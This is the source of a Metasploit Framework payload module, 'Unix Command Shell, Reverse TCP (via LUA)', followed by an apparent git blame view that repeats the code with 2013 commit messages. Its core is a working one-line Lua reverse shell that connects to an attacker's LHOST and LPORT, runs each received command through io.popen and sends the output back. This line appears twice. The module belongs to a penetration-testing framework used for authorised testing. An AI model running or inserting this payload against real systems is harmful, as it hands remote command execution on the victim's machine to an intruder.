metasploit-framework/modules/payloads/singles/cmd/unix/reverse_lua.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Unix Command Shell, Reverse TCP (via LUA)',
      'Description'   => 'Creates an interactive shell via LUA',
      'Author'        =>
      [
        'xistence <xistence[at]0x90.nl>',
      ],
      'License'       => MSF_LICENSE,
      'Platform'      => 'unix',
      'Arch'          => ARCH_CMD,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Session'       => Msf::Sessions::CommandShell,
      'PayloadType'   => 'cmd',
      'RequiredCmd'   => 'lua',
      'Payload'       =>
      {
        'Offsets' => { },
        'Payload' => ''
      }
    ))
  end

  #
  # Constructs the payload
  #
  def generate
    return super + command_string
  end

  #
  # Returns the command string to use for execution
  #
  def command_string
    "lua -e \"local s=require('socket');local t=assert(s.tcp());t:connect('#{datastore['LHOST']}',#{datastore['LPORT']});while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();\""
  end

end
added LUA bind/reverse shells 2013-09-16 10:02:08 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`
			`require 'msf/core/handler/reverse_tcp'`
			`require 'msf/base/sessions/command_shell'`
			`require 'msf/base/sessions/command_shell_options'`

			`module Metasploit3`

			`include Msf::Payload::Single`
			`include Msf::Sessions::CommandShellOptions`

			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'Unix Command Shell, Reverse TCP (via LUA)',`
			`'Description' => 'Creates an interactive shell via LUA',`
			`'Author' =>`
			`[`
			`'xistence <xistence[at]0x90.nl>',`
			`],`
			`'License' => MSF_LICENSE,`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`'Handler' => Msf::Handler::ReverseTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'lua',`
			`'Payload' =>`
			`{`
			`'Offsets' => { },`
			`'Payload' => ''`
			`}`
			`))`
			`end`

			`#`
			`# Constructs the payload`
			`#`
			`def generate`
			`return super + command_string`
			`end`

			`#`
			`# Returns the command string to use for execution`
			`#`
			`def command_string`
removed shell prompt in lua bind/reverse shells 2013-09-22 07:53:59 +00:00			`"lua -e \"local s=require('socket');local t=assert(s.tcp());t:connect('#{datastore['LHOST']}',#{datastore['LPORT']});while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();\""`
added LUA bind/reverse shells 2013-09-16 10:02:08 +00:00			`end`

			`end`